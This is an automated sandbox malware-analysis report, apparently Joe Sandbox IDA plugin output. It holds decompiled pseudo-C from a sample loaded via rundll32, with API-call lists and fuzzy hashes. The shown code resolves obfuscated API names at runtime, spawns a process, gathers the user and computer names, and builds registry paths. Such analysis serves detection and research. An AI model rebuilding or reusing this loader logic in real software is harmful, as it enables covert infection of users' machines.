                                                  						_t50 =  *0x547d27c; // 0x1f6a5a8
                                                  						_t19 = _t50 + 0x547e747; // 0x73e8cef
                                                  						_t20 = _t50 + 0x547e0af; // 0x4e52454b
                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                  						if(_t71 == 0) {
                                                  							_v8 = 0x7f;
                                                  						} else {
                                                  							_v108 = 0x44;
                                                  							E054784D5();
                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                  							_push(1);
                                                  							E054784D5();
                                                  							if(_t58 == 0) {
                                                  								_v8 = GetLastError();
                                                  							} else {
                                                  								CloseHandle(_v28);
                                                  								CloseHandle(_v32);
                                                  							}
                                                  						}
                                                  						HeapFree( *0x547d238, 0, _t68);
                                                  					}
                                                  				}
                                                  				_t70 = _v16;
                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                  				E05479039(_t70);
                                                  				goto L12;
                                                  			}
                                                  0x05472066
                                                  0x05472066
                                                  0x05472075
                                                  0x0547207e
                                                  0x05472081
                                                  0x0547218e
                                                  0x05472195
                                                  0x05472195
                                                  0x05472090
                                                  0x05472098
                                                  0x0547209d
                                                  0x054720a0
                                                  0x054720b5
                                                  0x054720bb
                                                  0x054720bc
                                                  0x054720bf
                                                  0x054720c5
                                                  0x054720c8
                                                  0x054720cd
                                                  0x054720d5
                                                  0x054720e1
                                                  0x054720e5
                                                  0x05472175
                                                  0x054720eb
                                                  0x054720eb
                                                  0x054720f0
                                                  0x054720f7
                                                  0x0547210b
                                                  0x0547210f
                                                  0x0547215e
                                                  0x05472111
                                                  0x05472112
                                                  0x05472119
                                                  0x05472132
                                                  0x05472134
                                                  0x05472138
                                                  0x0547213f
                                                  0x05472159
                                                  0x05472141
                                                  0x0547214a
                                                  0x0547214f
                                                  0x0547214f
                                                  0x0547213f
                                                  0x0547216d
                                                  0x0547216d
                                                  0x054720e5
                                                  0x0547217c
                                                  0x05472185
                                                  0x05472189
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0547692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0547207A,?,00000001,?,?,00000000,00000000), ref: 05476951
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 05476973
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 05476989
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0547699F
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 054769B5
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 054769CB
                                                  • memset.NTDLL ref: 054720C8
                                                    • Part of subcall function 054795B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,054723E9,63699BCE,05471354,73797325), ref: 054795C2
                                                    • Part of subcall function 054795B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 054795DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,073E8CEF,73797325), ref: 054720FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 05472105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 0547216D
                                                    • Part of subcall function 054784D5: GetProcAddress.KERNEL32(36776F57,054721E5), ref: 054784F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 0547214A
                                                  • CloseHandle.KERNEL32(?), ref: 0547214F
                                                  • GetLastError.KERNEL32(00000001), ref: 05472153
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: f6c9b5e6bf20ce8aa2ddd0be33a1c2cbcac4eaf8347f9d051600eef7b531d861
                                                  • Instruction ID: e0ff736a6ea9e86786465e8eed433d3282fe5e71ea44fafaea716e9235499d96
                                                  • Opcode Fuzzy Hash: f6c9b5e6bf20ce8aa2ddd0be33a1c2cbcac4eaf8347f9d051600eef7b531d861
                                                  • Instruction Fuzzy Hash: C33118B690420CAFDB109FE5D889DDFBFBDFB08254F0044AAF605A7210DB749E458BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 63%
                                                  			E05478307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t13;
                                                  				char* _t28;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				char* _t36;
                                                  				intOrPtr* _t40;
                                                  				char* _t41;
                                                  				char* _t42;
                                                  				char* _t43;
                                                  
                                                  				_t34 = __edx;
                                                  				_push(__ecx);
                                                  				_t9 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t1 = _t9 + 0x547e62c; // 0x253d7325
                                                  				_t36 = 0;
                                                  				_t28 = E05479401(__ecx, _t1);
                                                  				if(_t28 != 0) {
                                                  					_t40 = __imp__;
                                                  					_t13 =  *_t40(_t28);
                                                  					_v8 = _t13;
                                                  					_t41 = E05472049(_v8 +  *_t40(_a4) + 1);
                                                  					if(_t41 != 0) {
                                                  						strcpy(_t41, _t28);
                                                  						_pop(_t33);
                                                  						__imp__(_t41, _a4);
                                                  						_t36 = E05477225(_t34, _t41, _a8);
                                                  						E05479039(_t41);
                                                  						_t42 = E05478E82(StrTrimA(_t36, "="), _t36);
                                                  						if(_t42 != 0) {
                                                  							E05479039(_t36);
                                                  							_t36 = _t42;
                                                  						}
                                                  						_t43 = E0547788B(_t36, _t33);
                                                  						if(_t43 != 0) {
                                                  							E05479039(_t36);
                                                  							_t36 = _t43;
                                                  						}
                                                  					}
                                                  					E05479039(_t28);
                                                  				}
                                                  				return _t36;
                                                  			}
                                                  0x05478307
                                                  0x0547830a
                                                  0x0547830b
                                                  0x05478313
                                                  0x0547831a
                                                  0x05478321
                                                  0x05478325
                                                  0x0547832b
                                                  0x05478332
                                                  0x05478337
                                                  0x05478349
                                                  0x0547834d
                                                  0x05478351
                                                  0x05478357
                                                  0x0547835c
                                                  0x0547836c
                                                  0x0547836e
                                                  0x05478385
                                                  0x05478389
                                                  0x0547838c
                                                  0x05478391
                                                  0x05478391
                                                  0x0547839a
                                                  0x0547839e
                                                  0x054783a1
                                                  0x054783a6
                                                  0x054783a6
                                                  0x0547839e
                                                  0x054783a9
                                                  0x054783a9
                                                  0x054783b4

                                                  APIs
                                                    • Part of subcall function 05479401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,05478321,253D7325,00000000,00000000,74ECC740,?,?,0547A428,?), ref: 05479468
                                                    • Part of subcall function 05479401: sprintf.NTDLL ref: 05479489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,0547A428,?,073E95B0), ref: 05478332
                                                  • lstrlen.KERNEL32(?,?,?,0547A428,?,073E95B0), ref: 0547833A
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • strcpy.NTDLL ref: 05478351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 0547835C
                                                    • Part of subcall function 05477225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,0547836B,00000000,?,?,?,0547A428,?,073E95B0), ref: 0547723C
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0547A428,?,073E95B0), ref: 05478379
                                                    • Part of subcall function 05478E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,05478385,00000000,?,?,0547A428,?,073E95B0), ref: 05478E8C
                                                    • Part of subcall function 05478E82: _snprintf.NTDLL ref: 05478EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: 648d136d71c5ad1ed15413b51d2c1c97e7ea2816121dbcc8abe563cc7e030673
                                                  • Instruction ID: 0734a041b02254c6ecc799f1cff72ed4e5695e7c4f998ac9a2aef695fd716175
                                                  • Opcode Fuzzy Hash: 648d136d71c5ad1ed15413b51d2c1c97e7ea2816121dbcc8abe563cc7e030673
                                                  • Instruction Fuzzy Hash: E811A333A1162CA786266BBAAC8CCEF3F9DEF85564705015FF50597200DE35DD0297E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 05476D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 05476D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 05476D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05476DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05476DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05476DC3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 6edc58278b7ce31e76d58aa28c58cb6d9c46c53e6b4ae4d9811e5c89180f1587
                                                  • Instruction ID: 240204714d06eff8e8542a3480baed5e6b5d5e47c2a2ba9aa2ae879609194773
                                                  • Opcode Fuzzy Hash: 6edc58278b7ce31e76d58aa28c58cb6d9c46c53e6b4ae4d9811e5c89180f1587
                                                  • Instruction Fuzzy Hash: 4E313032D10A1DABDB01DFB8C444ADFBBB6AF49210F154466E915EB210DB719E05CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0547692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t26;
                                                  				_Unknown_base(*)()* _t28;
                                                  				intOrPtr _t30;
                                                  				_Unknown_base(*)()* _t32;
                                                  				intOrPtr _t33;
                                                  				_Unknown_base(*)()* _t35;
                                                  				intOrPtr _t36;
                                                  				_Unknown_base(*)()* _t38;
                                                  				intOrPtr _t39;
                                                  				_Unknown_base(*)()* _t41;
                                                  				intOrPtr _t44;
                                                  				struct HINSTANCE__* _t48;
                                                  				intOrPtr _t54;
                                                  
                                                  				_t54 = E05472049(0x20);
                                                  				if(_t54 == 0) {
                                                  					_v8 = 8;
                                                  				} else {
                                                  					_t23 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t1 = _t23 + 0x547e11a; // 0x4c44544e
                                                  					_t48 = GetModuleHandleA(_t1);
                                                  					_t26 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t2 = _t26 + 0x547e769; // 0x7243775a
                                                  					_v8 = 0x7f;
                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                  					 *(_t54 + 0xc) = _t28;
                                                  					if(_t28 == 0) {
                                                  						L8:
                                                  						E05479039(_t54);
                                                  					} else {
                                                  						_t30 =  *0x547d27c; // 0x1f6a5a8
                                                  						_t5 = _t30 + 0x547e756; // 0x614d775a
                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                  						 *(_t54 + 0x10) = _t32;
                                                  						if(_t32 == 0) {
                                                  							goto L8;
                                                  						} else {
                                                  							_t33 =  *0x547d27c; // 0x1f6a5a8
                                                  							_t7 = _t33 + 0x547e40b; // 0x6e55775a
                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                  							 *(_t54 + 0x14) = _t35;
                                                  							if(_t35 == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t36 =  *0x547d27c; // 0x1f6a5a8
                                                  								_t9 = _t36 + 0x547e4d2; // 0x4e6c7452
                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                  								 *(_t54 + 0x18) = _t38;
                                                  								if(_t38 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									_t39 =  *0x547d27c; // 0x1f6a5a8
                                                  									_t11 = _t39 + 0x547e779; // 0x6c43775a
                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                  									 *(_t54 + 0x1c) = _t41;
                                                  									if(_t41 == 0) {
                                                  										goto L8;
                                                  									} else {
                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                  										_t44 = E0547727B(_t54, _a8);
                                                  										_v8 = _t44;
                                                  										if(_t44 != 0) {
                                                  											goto L8;
                                                  										} else {
                                                  											 *_a12 = _t54;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0547207A,?,00000001,?,?,00000000,00000000), ref: 05476951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 05476973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 05476989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0547699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 054769B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 054769CB
                                                    • Part of subcall function 0547727B: memset.NTDLL ref: 054772FA
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 1955fee37e191a654898b4cbba08d80d64d6a5a8e93db471ba30629fbaa1231c
                                                  • Instruction ID: bd37f968939a0d976fda06a92c3af14a7bdf48522bb14624b49779798ec0ff9f
                                                  • Opcode Fuzzy Hash: 1955fee37e191a654898b4cbba08d80d64d6a5a8e93db471ba30629fbaa1231c
                                                  • Instruction Fuzzy Hash: B8213CB161160EEFDB24DFB9D844EDB7BECEB0825070245AAE605CB311E630ED018B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E05477649() {
                                                  				long _v8;
                                                  				long _v12;
                                                  				int _v16;
                                                  				long _t39;
                                                  				long _t43;
                                                  				signed int _t47;
                                                  				signed int _t52;
                                                  				int _t56;
                                                  				int _t57;
                                                  				char* _t63;
                                                  				short* _t66;
                                                  
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				GetUserNameW(0,  &_v8);
                                                  				_t39 = _v8;
                                                  				if(_t39 != 0) {
                                                  					_v12 = _t39;
                                                  					_v8 = 0;
                                                  					GetComputerNameW(0,  &_v8);
                                                  					_t43 = _v8;
                                                  					if(_t43 != 0) {
                                                  						_v12 = _v12 + _t43 + 2;
                                                  						_t63 = E05472049(_v12 + _t43 + 2 << 2);
                                                  						if(_t63 != 0) {
                                                  							_t47 = _v12;
                                                  							_t66 = _t63 + _t47 * 2;
                                                  							_v8 = _t47;
                                                  							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                  								L7:
                                                  								E05479039(_t63);
                                                  							} else {
                                                  								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                                                  								_t52 = _v8;
                                                  								_v12 = _v12 - _t52;
                                                  								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                  									goto L7;
                                                  								} else {
                                                  									_t56 = _v12 + _v8;
                                                  									_t31 = _t56 + 2; // 0x547a33a
                                                  									_v12 = _t56;
                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                                                  									_v8 = _t57;
                                                  									if(_t57 == 0) {
                                                  										goto L7;
                                                  									} else {
                                                  										_t63[_t57] = 0;
                                                  										_v16 = _t63;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v16;
                                                  			}

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,0547A338), ref: 0547765D
                                                  • GetComputerNameW.KERNEL32(00000000,0547A338), ref: 05477679
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • GetUserNameW.ADVAPI32(00000000,0547A338), ref: 054776B3
                                                  • GetComputerNameW.KERNEL32(0547A338,?), ref: 054776D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0547A338,00000000,0547A33A,00000000,00000000,?,?,0547A338), ref: 054776F8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 6d3f1f36a63b6eb818620bc33f2a65da457976ea7edfa613ef5df6782288cc15
                                                  • Instruction ID: 4613f4f908ca4cd96b518f3a6386ee8112e0855bccd74ddfa0ab716a6fc96497
                                                  • Opcode Fuzzy Hash: 6d3f1f36a63b6eb818620bc33f2a65da457976ea7edfa613ef5df6782288cc15
                                                  • Instruction Fuzzy Hash: 6521D97691020CFBCB15DFE9D9C5CEEBBB8EF44244B5044AAE502E7200DB30AB44DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E05471585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __esi;
                                                  				long _t10;
                                                  				void* _t18;
                                                  				void* _t22;
                                                  
                                                  				_t9 = __eax;
                                                  				_t22 = __eax;
                                                  				if(_a4 != 0 && E05477F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                  					L9:
                                                  					return GetLastError();
                                                  				}
                                                  				_t10 = E0547A9AB(_t9, _t18, _t22, _a8);
                                                  				if(_t10 == 0) {
                                                  					ResetEvent( *(_t22 + 0x1c));
                                                  					ResetEvent( *(_t22 + 0x20));
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0xffffffff);
                                                  					_push(0);
                                                  					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                  					if( *0x547d130() != 0) {
                                                  						SetEvent( *(_t22 + 0x1c));
                                                  						goto L7;
                                                  					} else {
                                                  						_t10 = GetLastError();
                                                  						if(_t10 == 0x3e5) {
                                                  							L7:
                                                  							_t10 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_t10 == 0xffffffff) {
                                                  					goto L9;
                                                  				}
                                                  				return _t10;
                                                  			}

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,054711DA,?,?,00000000,00000000), ref: 054715BF
                                                  • ResetEvent.KERNEL32(?), ref: 054715C4
                                                  • GetLastError.KERNEL32 ref: 054715DC
                                                  • GetLastError.KERNEL32(?,?,00000102,054711DA,?,?,00000000,00000000), ref: 054715F7
                                                    • Part of subcall function 05477F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,054715A4,?,?,?,?,00000102,054711DA,?,?,00000000), ref: 05477F33
                                                    • Part of subcall function 05477F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,054715A4,?,?,?,?,00000102,054711DA,?), ref: 05477F91
                                                    • Part of subcall function 05477F27: lstrcpy.KERNEL32(00000000,00000000), ref: 05477FA1
                                                  • SetEvent.KERNEL32(?), ref: 054715EA
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: b1503dbb3262afa215f4a754ca3b56568a5ad5d61ce1622e3c07ac5d9f2410dc
                                                  • Instruction ID: 2340e02cb4f6ed17e773c7abed6d78f467e55dd4844e05e13af7eac5a66ea203
                                                  • Opcode Fuzzy Hash: b1503dbb3262afa215f4a754ca3b56568a5ad5d61ce1622e3c07ac5d9f2410dc
                                                  • Instruction Fuzzy Hash: 2A01AD31114209ABDA346A72DC88FEBBBA9FF44360F104A2AF152911E0DA20E815DA61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E05478F10(intOrPtr _a4) {
                                                  				void* _t2;
                                                  				long _t4;
                                                  				void* _t5;
                                                  				long _t6;
                                                  				void* _t7;
                                                  				void* _t13;
                                                  
                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                  				 *0x547d26c = _t2;
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				_t4 = GetVersion();
                                                  				if(_t4 != 5) {
                                                  					L4:
                                                  					if(_t13 <= 0) {
                                                  						_t5 = 0x32;
                                                  						return _t5;
                                                  					}
                                                  					L5:
                                                  					 *0x547d25c = _t4;
                                                  					_t6 = GetCurrentProcessId();
                                                  					 *0x547d258 = _t6;
                                                  					 *0x547d264 = _a4;
                                                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                  					 *0x547d254 = _t7;
                                                  					if(_t7 == 0) {
                                                  						 *0x547d254 =  *0x547d254 | 0xffffffff;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				if(_t4 > 0) {
                                                  					goto L5;
                                                  				}
                                                  				_t13 = _t4 - _t4;
                                                  				goto L4;
                                                  			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05476A90,?,?,00000001,?,?,?,0547807D,?), ref: 05478F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,0547807D,?), ref: 05478F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,0547807D,?), ref: 05478F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,0547807D,?), ref: 05478F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,0547807D,?), ref: 05478F7A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: 428fefc9f9c2c99cded01b2cbc9cdd6923cd682a9247ca25b8ee887914dc8808
                                                  • Instruction ID: eb96e1b5337bf8d3b2bbb3acd9205f1524d36142a1fadaf585c0ebca3d15ba8a
                                                  • Opcode Fuzzy Hash: 428fefc9f9c2c99cded01b2cbc9cdd6923cd682a9247ca25b8ee887914dc8808
                                                  • Instruction Fuzzy Hash: D8F0AF30BB534D9AE72C8F64AC0EBD53FA2BB44780F40019AF152D62D5DE708402CF24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E054717D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				signed int* _v16;
                                                  				char _v284;
                                                  				void* __esi;
                                                  				char* _t60;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr _t65;
                                                  				char _t68;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t75;
                                                  				void* _t78;
                                                  				void* _t88;
                                                  				void* _t97;
                                                  				void* _t98;
                                                  				char _t104;
                                                  				signed int* _t106;
                                                  				intOrPtr* _t107;
                                                  				void* _t108;
                                                  
                                                  				_t98 = __ecx;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t104 = _a16;
                                                  				if(_t104 == 0) {
                                                  					__imp__( &_v284,  *0x547d33c);
                                                  					_t97 = 0x80000002;
                                                  					L6:
                                                  					_t60 = E0547809F(0,  &_v284);
                                                  					_a8 = _t60;
                                                  					if(_t60 == 0) {
                                                  						_v8 = 8;
                                                  						L29:
                                                  						_t61 = _a20;
                                                  						if(_t61 != 0) {
                                                  							 *_t61 =  *_t61 + 1;
                                                  						}
                                                  						return _v8;
                                                  					}
                                                  					_t107 = _a24;
                                                  					if(E054788B7(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                  						L27:
                                                  						E05479039(_a8);
                                                  						goto L29;
                                                  					}
                                                  					_t65 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t16 = _t65 + 0x547e8fe; // 0x65696c43
                                                  					_t68 = E0547809F(0, _t16);
                                                  					_a24 = _t68;
                                                  					if(_t68 == 0) {
                                                  						L14:
                                                  						_t29 = _t107 + 0x14; // 0x102
                                                  						_t33 = _t107 + 0x10; // 0x3d0547c0
                                                  						if(E0547A635(_t103,  *_t33, _t97, _a8,  *0x547d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                  							_t72 =  *0x547d27c; // 0x1f6a5a8
                                                  							if(_t104 == 0) {
                                                  								_t35 = _t72 + 0x547ea5f; // 0x4d4c4b48
                                                  								_t73 = _t35;
                                                  							} else {
                                                  								_t34 = _t72 + 0x547e89f; // 0x55434b48
                                                  								_t73 = _t34;
                                                  							}
                                                  							if(E0547816C(_t73,  *0x547d334,  *0x547d338,  &_a24,  &_a16) == 0) {
                                                  								if(_t104 == 0) {
                                                  									_t75 =  *0x547d27c; // 0x1f6a5a8
                                                  									_t44 = _t75 + 0x547e871; // 0x74666f53
                                                  									_t78 = E0547809F(0, _t44);
                                                  									_t105 = _t78;
                                                  									if(_t78 == 0) {
                                                  										_v8 = 8;
                                                  									} else {
                                                  										_t47 = _t107 + 0x10; // 0x3d0547c0
                                                  										E05472659( *_t47, _t97, _a8,  *0x547d338, _a24);
                                                  										_t49 = _t107 + 0x10; // 0x3d0547c0
                                                  										E05472659( *_t49, _t97, _t105,  *0x547d330, _a16);
                                                  										E05479039(_t105);
                                                  									}
                                                  								} else {
                                                  									_t40 = _t107 + 0x10; // 0x3d0547c0
                                                  									E05472659( *_t40, _t97, _a8,  *0x547d338, _a24);
